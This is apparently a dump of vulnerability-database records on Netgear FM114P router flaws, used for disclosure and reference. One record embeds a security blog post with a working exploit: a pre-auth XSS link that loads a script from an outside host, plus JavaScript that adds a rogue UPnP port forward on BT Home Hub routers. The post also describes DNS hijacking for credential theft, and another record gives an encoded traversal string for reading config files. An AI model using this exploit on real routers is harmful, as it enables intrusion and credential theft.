"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/5667"
},
{
"trust": 1.7,
"url": "http://www.iss.net/security_center/static/10061.php"
},
{
"trust": 1.1,
"url": "http://online.securityfocus.com/archive/1/290849"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/3475"
},
{
"trust": 0.3,
"url": "http://www.netgear.com/product_view.asp?xrp=4\u0026yrp=12\u0026zrp=142"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-6260"
},
{
"db": "BID",
"id": "5667"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-511"
},
{
"db": "NVD",
"id": "CVE-2002-1877"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2002-3535"
},
{
"db": "VULHUB",
"id": "VHN-6260"
},
{
"db": "BID",
"id": "5667"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-511"
},
{
"db": "NVD",
"id": "CVE-2002-1877"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2002-09-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2002-3535"
},
{
"date": "2002-12-31T00:00:00",
"db": "VULHUB",
"id": "VHN-6260"
},
{
"date": "2002-09-07T00:00:00",
"db": "BID",
"id": "5667"
},
{
"date": "2002-09-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200212-511"
},
{
"date": "2002-12-31T05:00:00",
"db": "NVD",
"id": "CVE-2002-1877"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2002-09-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2002-3535"
},
{
"date": "2009-10-14T00:00:00",
"db": "VULHUB",
"id": "VHN-6260"
},
{
"date": "2002-09-07T00:00:00",
"db": "BID",
"id": "5667"
},
{
"date": "2009-10-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200212-511"
},
{
"date": "2025-04-03T01:03:51.193000",
"db": "NVD",
"id": "CVE-2002-1877"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200212-511"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "NetGear FM114P Prosafe URL filtering bypasses the vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2002-3535"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200212-511"
}
],
"trust": 0.6
}
}
VAR-200312-0394
Vulnerability from variot - Updated: 2025-04-03 22:21Directory traversal vulnerability in the web configuration interface in Netgear FM114P 1.4 allows remote attackers to read arbitrary files, such as the netgear.cfg configuration file, via a hex-encoded (%2e%2e%2f) ../ (dot dot slash) in the port parameter. Netgear FM114P is a wireless network router that includes a firewall function.
Netgear FM114P wireless firewall lacks proper filtering of web requests submitted by users.
Netgear FM114P's WEB configuration interface lacks sufficient filtering for user-submitted requests. Attackers can submit malicious URL requests to break through the / upnp / service directory limit. Unauthorized access to router configuration files. Configuration files contain dial-up passwords, dynamic DNS configuration passwords, and router configurations. Options, etc. Attackers can use this information to conduct further attacks on routers. Netgear FM114P Wireless Firewalls allow directory traversal using escaped character sequences. It is possible for an unauthenticated user to retrieve the firewall's configuration file by escaping from the /upnp/service directory
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200312-0394",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "fm114p",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "1.4_beta_release_17"
},
{
"model": null,
"scope": null,
"trust": 0.6,
"vendor": "none",
"version": null
},
{
"model": "fm114p",
"scope": null,
"trust": 0.3,
"vendor": "netgear",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0418"
},
{
"db": "BID",
"id": "6807"
},
{
"db": "CNNVD",
"id": "CNNVD-200312-129"
},
{
"db": "NVD",
"id": "CVE-2003-1427"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "stickler\u203b stickler@rbg.informatik.tu-darmstadt.de",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200312-129"
}
],
"trust": 0.6
},
"cve": "CVE-2003-1427",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2003-1427",
"impactScore": 4.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-8252",
"impactScore": 4.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2003-1427",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200312-129",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-8252",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-8252"
},
{
"db": "CNNVD",
"id": "CNNVD-200312-129"
},
{
"db": "NVD",
"id": "CVE-2003-1427"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Directory traversal vulnerability in the web configuration interface in Netgear FM114P 1.4 allows remote attackers to read arbitrary files, such as the netgear.cfg configuration file, via a hex-encoded (%2e%2e%2f) ../ (dot dot slash) in the port parameter. Netgear FM114P is a wireless network router that includes a firewall function. \n\n\u00a0Netgear FM114P wireless firewall lacks proper filtering of web requests submitted by users. \n\n\u00a0Netgear FM114P\u0027s WEB configuration interface lacks sufficient filtering for user-submitted requests. Attackers can submit malicious URL requests to break through the / upnp / service directory limit. Unauthorized access to router configuration files. Configuration files contain dial-up passwords, dynamic DNS configuration passwords, and router configurations. Options, etc. Attackers can use this information to conduct further attacks on routers. Netgear FM114P Wireless Firewalls allow directory traversal using escaped character sequences. It is possible for an unauthenticated user to retrieve the firewall\u0027s configuration file by escaping from the /upnp/service directory",
"sources": [
{
"db": "NVD",
"id": "CVE-2003-1427"
},
{
"db": "CNVD",
"id": "CNVD-2003-0418"
},
{
"db": "BID",
"id": "6807"
},
{
"db": "VULHUB",
"id": "VHN-8252"
}
],
"trust": 1.8
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-8252",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-8252"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2003-1427",
"trust": 2.3
},
{
"db": "BID",
"id": "6807",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-200312-129",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2003-0418",
"trust": 0.6
},
{
"db": "XF",
"id": "114",
"trust": 0.6
},
{
"db": "XF",
"id": "11279",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20030209 BUG IN NETGEAR FM114P WIRELESS ROUTER FIRMWARE",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "4370",
"trust": 0.6
},
{
"db": "SEEBUG",
"id": "SSVID-76046",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "22236",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-8252",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0418"
},
{
"db": "VULHUB",
"id": "VHN-8252"
},
{
"db": "BID",
"id": "6807"
},
{
"db": "CNNVD",
"id": "CNNVD-200312-129"
},
{
"db": "NVD",
"id": "CVE-2003-1427"
}
]
},
"id": "VAR-200312-0394",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-8252"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-03T22:21:55.908000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-8252"
},
{
"db": "NVD",
"id": "CVE-2003-1427"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/6807"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/311160"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/11279"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/11279"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/4370"
},
{
"trust": 0.3,
"url": "http://www.netgear.com/product_view.asp?xrp=4\u0026yrp=12\u0026zrp=142"
},
{
"trust": 0.3,
"url": "/archive/1/311160"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-8252"
},
{
"db": "BID",
"id": "6807"
},
{
"db": "CNNVD",
"id": "CNNVD-200312-129"
},
{
"db": "NVD",
"id": "CVE-2003-1427"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2003-0418"
},
{
"db": "VULHUB",
"id": "VHN-8252"
},
{
"db": "BID",
"id": "6807"
},
{
"db": "CNNVD",
"id": "CNNVD-200312-129"
},
{
"db": "NVD",
"id": "CVE-2003-1427"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2003-02-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2003-0418"
},
{
"date": "2003-12-31T00:00:00",
"db": "VULHUB",
"id": "VHN-8252"
},
{
"date": "2003-02-10T00:00:00",
"db": "BID",
"id": "6807"
},
{
"date": "2003-02-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200312-129"
},
{
"date": "2003-12-31T05:00:00",
"db": "NVD",
"id": "CVE-2003-1427"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2003-02-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2003-0418"
},
{
"date": "2017-07-29T00:00:00",
"db": "VULHUB",
"id": "VHN-8252"
},
{
"date": "2003-02-10T00:00:00",
"db": "BID",
"id": "6807"
},
{
"date": "2003-12-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200312-129"
},
{
"date": "2025-04-03T01:03:51.193000",
"db": "NVD",
"id": "CVE-2003-1427"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200312-129"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear FM114P Wireless Firewall File Disclosure Vulnerability",
"sources": [
{
"db": "BID",
"id": "6807"
},
{
"db": "CNNVD",
"id": "CNNVD-200312-129"
}
],
"trust": 0.9
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200312-129"
}
],
"trust": 0.6
}
}
VAR-200304-0138
Vulnerability from variot - Updated: 2022-05-17 22:39Netgear FM114P ProSafe is a wireless network router. The Netgear FM114P ProSafe wireless network router has a vulnerability when using the UPnP feature, which can be exploited by remote attackers to obtain WAN interface username and password information. If the remote access and UPnP functions are enabled on the device, the remote user can verify the username and password information for the Netgear FM114P ProSafe connection, which can be obtained by submitting a UPnP soap request to the WAN interface. http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-5
It's known that UPnP [1] is inherently insecure for a very simple reason: administrative tasks can be performed on a Internet Gateway Device (IGD) without needing to know the admin password whatsoever! This on its own is quite scary and I personally feel that although there is some research in the public domain, there is much more attention that needs to be paid to UPnP.
UPnP allows you to perform administrative functions. Some functions are very standardized and supported by most devices. Examples include obtaining network settings, and enabling port forwarding rules. Other functions are make/model specific. Some very scary functions such as obtaining administrative username and password pairs have been reported [2] in the past. As a reminder, this works without submitting any administrative password whatsoever since UPnP is a authenticationless protocol. On top of this, most IGDs support UPnP by default.
After having read several UPnP security research materials I realized that all the described attacks assume that the attacker (be it human or malware) comes from inside the network. This post describes how to exploit IGDs remotely via UPnP even when no services are publicly available (WAN interface).
** Preauth XSS + SOAP payload = remote UPnP exploitation **
If you sniff yourself while running software that uses UPnP in the background to help you configure your router, you'll see that UPnP is nothing more than SOAP. Our AJAX knowledge tells us about a feature that allows us to craft arbitrary XML requests: the XMLHttpRequest [3] object. Trouble is, such object can only be used within the context of the site that the requests are submitted to. So if we host the malicious scripting code on a third-party site, and a victim user located in the same LAN as the target IGD visits such page, the request wouldn't go through due to XMLHttpRequest same-origin policy restricition. Or put in a different way: you aren't allowed to make XMLHttpRequests to any server except the server where your web page came from.
However, if you find a pre-auth XSS vulnerability [4] on the target device you can bypass such restriction. For instance, many devices such as the BT Home Hub and Speedtouch routers offer certain pages before authenticating. Some of these pages are cgi scripts which are vulnerable to XSS. Although offering certain "useless" functionalities before logging into the router might not seem like a big deal, it can actually lead to UPnP being exploited remotely, even if the web admin console is not visible from the Internet!
The following is a non-malicious proof-of-concept exploit which sets up a port-forwarding rule from port 1337 on the WAN interface to port 445 on the internal IP address 192.168.1.64. Such IP address is the first usable IP address reserved for clients connected to Speedtouch and BT Home Hub routers. The exploit has been tested on BT Home Hub - Firmware version 6.2.6.B. Just to make things clear, UPnP is enabled by default on the BT Home Hub, just like most IGDs. If your Internet gateway is a BT Home Hub, clicking on the following link should add a new forward rule called EVILFORWARDRULE: ATTACK http://192.168.1.254/cgi/b/ic/connect/?url=%22%3e%3cscript%20src='http://www.gnucitizen.org/projects/bt-home-flub-pwnin-the-bt-home-hub-5/payload.xss'%3e%3c/script%3e%3ca%20b=
In order to check if the port-forwarding rule was added successfully you can use UPnP Port Forwarding Utility [5] and simply click on "Update list now" after the device has been discovered (device name should show on the top-left corner a few seconds later after launching the tool). You could of course use the technique and code explained in this post on any Internet gateway that supports UPnP and is a vulnerable to a preauth XSS vulnerability. If you manage to successfully test this attack on the BT Home Hub or any other device please let us know!
** Zombie routers and the unvalidated NewInternalClient bug **
A bit of more UPnP hacking lead me to realize that the BT Home Hub is vulnerable to the (in)famous unvalidated NewInternalClient bug. This bug allows you to choose external IP addresses instead of a LAN IP addresses as intended when setting up port-forwarding rules via UPnP. In this case, I reused the previous code and changed the internal IP address (192.168.1.64) in the NewInternalClient tag with the IP address of a random Internet web server and the value of the NewInternalPort tag to 80. This effectively allows an attacker to use the vulnerable BT Home Hub router as a proxy - aka onion router. In other words, when probing the router's NATed IP address on port 1337, the attacker is effectively probing the IP address and port number specified by the port-forwarding rule - except the routers IP address would be shown in logs of the target web server, as opposed to the attacker's real IP address. I thought this is a nice real example of how a vulnerable router can be used as a zombie by simply having a user visit a page with malicious scripting (XSS + UPnP SOAP request). Imagine running your favourite vulnerability scanner against a target site, while using the victim user's router as a proxy - sweet!
There are other UPnP functionalities besides port forwarding rules that look potentially interesting from a hacking point of view. For instance, SetDNSServer [6] allows you to guess what, set the gateway's DNS server. Imagine someone changing your router's DNS server setting by simply visiting a webpage. After that you visit yourfavoritebank.com and guess what, you're actually visiting a malicious server that is harvesting all your banking login details! I'll leave the exercise of writing a remote UPnP exploit that changes the DNS server setting on the BT Home Hub (or any other vulnerable router) to the reader.
** About GNUCITIZEN **
GNUCITIZEN is a Cutting Edge, Ethical Hacker Outfit, Information Think Tank, which primarily deals with all aspects of the art of hacking. Our work has been featured in established magazines and information portals, such as Wired, Eweek, The Register, PC Week, IDG, BBC and many others. The members of the GNUCITIZEN group are well known and well established experts in the Information Security, Black Public Relations (PR) Industries and Hacker Circles with widely recognized experience in the government and corporate sectors and the open source community.
GNUCITIZEN is an ethical, white-hat organization that doesn't hide anything. We strongly believe that knowledge belongs to everyone and we make everything to ensure that our readers have access to the latest cutting-edge research and get alerted of the newest security threats when they come. Our experience shows that the best way of protection is the mass information. And we mean that literally!!! It is in the public's best interest to make our findings accessible to vast majority of people, simply because it is proven that the more people know about a certain problem, the better.
[1] http://www.upnp.org/resources/whitepapers.asp [2] http://www.securityfocus.com/bid/7267/discuss [3] http://www.w3.org/TR/XMLHttpRequest/ [4] http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-4 [5] http://www.codeproject.com/KB/IP/PortForward.aspx [6] http://www-adele.imag.fr/users/Didier.Donsez/dev/osgi/upnpgendevice/api/fr/imag/adele/bundle/upnp/igd/model/LANHostConfigManagementModel.html#setDNSServer(java.lang.String)
// http://www.gnucitizen.org/projects/bt-home-flub-pwnin-the-bt-home-hub-5/payload.xss var req; var url="/upnp/control/igd/wanpppcInternet";
function loadXMLDoc(url) { req = false; // branch for native XMLHttpRequest object if(window.XMLHttpRequest && !(window.ActiveXObject)) { try { req = new XMLHttpRequest(); } catch(e) { req = false; } // branch for IE/Windows ActiveX version } else if(window.ActiveXObject) { try { req = new ActiveXObject("Msxml2.XMLHTTP"); } catch(e) { try { req = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) { req = false; } } } if(req) { req.onreadystatechange = processReqChange; req.open("POST", url, true); req.setRequestHeader('SOAPAction', '"urn:schemas-upnp-org:service:WANPPPConnection:1#AddPortMapping"');
req.send('<?xml version="1.0"?><SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">1337TCP445192.168.1.641EVILFORWARDRULE0'); } }
function processReqChange() { // only if req shows "loaded" if (req.readyState == 4) { // only if "OK" if (req.status == 200) { // ...processing statements go here... //alert(req.responseText); } else { alert("There was a problem retrieving the XML data:\n" + req.statusText); } } }
loadXMLDoc(url);
-- pagvac gnucitizen.org, ikwt.com
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200304-0138",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "fwag114 1.0.26rc4",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "fm114p",
"scope": null,
"trust": 0.3,
"vendor": "netgear",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0958"
},
{
"db": "BID",
"id": "7267"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Discovery is credited to Bj\u00f6rn Stickler \u003cstickler@rbg.informatik.tu-darmstadt.de\u003e.",
"sources": [
{
"db": "BID",
"id": "7267"
}
],
"trust": 0.3
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2003-0958",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2003-0958",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0958"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear FM114P ProSafe is a wireless network router. The Netgear FM114P ProSafe wireless network router has a vulnerability when using the UPnP feature, which can be exploited by remote attackers to obtain WAN interface username and password information. If the remote access and UPnP functions are enabled on the device, the remote user can verify the username and password information for the Netgear FM114P ProSafe connection, which can be obtained by submitting a UPnP soap request to the WAN interface. http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-5\n\nIt\u0027s known that UPnP [1] is inherently insecure for a very simple\nreason: administrative tasks can be performed on a Internet Gateway\nDevice (IGD) without needing to know the admin password whatsoever!\nThis on its own is quite scary and I personally feel that although\nthere is some research in the public domain, there is much more\nattention that needs to be paid to UPnP. \n\nUPnP allows you to perform administrative functions. Some functions\nare very standardized and supported by most devices. Examples include\nobtaining network settings, and enabling port forwarding rules. Other\nfunctions are make/model specific. Some very scary functions such as\nobtaining administrative username and password pairs have been\nreported [2] in the past. As a reminder, this works without submitting\nany administrative password whatsoever since UPnP is a\nauthenticationless protocol. On top of this, most IGDs support UPnP by\ndefault. \n\nAfter having read several UPnP security research materials I realized\nthat all the described attacks assume that the attacker (be it human\nor malware) comes from inside the network. This post describes how to\nexploit IGDs remotely via UPnP even when no services are publicly\navailable (WAN interface). \n\n\n** Preauth XSS + SOAP payload = remote UPnP exploitation **\n\nIf you sniff yourself while running software that uses UPnP in the\nbackground to help you configure your router, you\u0027ll see that UPnP is\nnothing more than SOAP. Our AJAX knowledge tells us about a feature\nthat allows us to craft arbitrary XML requests: the XMLHttpRequest [3]\nobject. Trouble is, such object can only be used within the context of\nthe site that the requests are submitted to. So if we host the\nmalicious scripting code on a third-party site, and a victim user\nlocated in the same LAN as the target IGD visits such page, the\nrequest wouldn\u0027t go through due to XMLHttpRequest same-origin policy\nrestricition. Or put in a different way: you aren\u0027t allowed to make\nXMLHttpRequests to any server except the server where your web page\ncame from. \n\nHowever, if you find a pre-auth XSS vulnerability [4] on the target\ndevice you can bypass such restriction. For instance, many devices\nsuch as the BT Home Hub and Speedtouch routers offer certain pages\nbefore authenticating. Some of these pages are cgi scripts which are\nvulnerable to XSS. Although offering certain \"useless\" functionalities\nbefore logging into the router might not seem like a big deal, it can\nactually lead to UPnP being exploited remotely, even if the web admin\nconsole is not visible from the Internet!\n\nThe following is a non-malicious proof-of-concept exploit which sets\nup a port-forwarding rule from port 1337 on the WAN interface to port\n445 on the internal IP address 192.168.1.64. Such IP address is the\nfirst usable IP address reserved for clients connected to Speedtouch\nand BT Home Hub 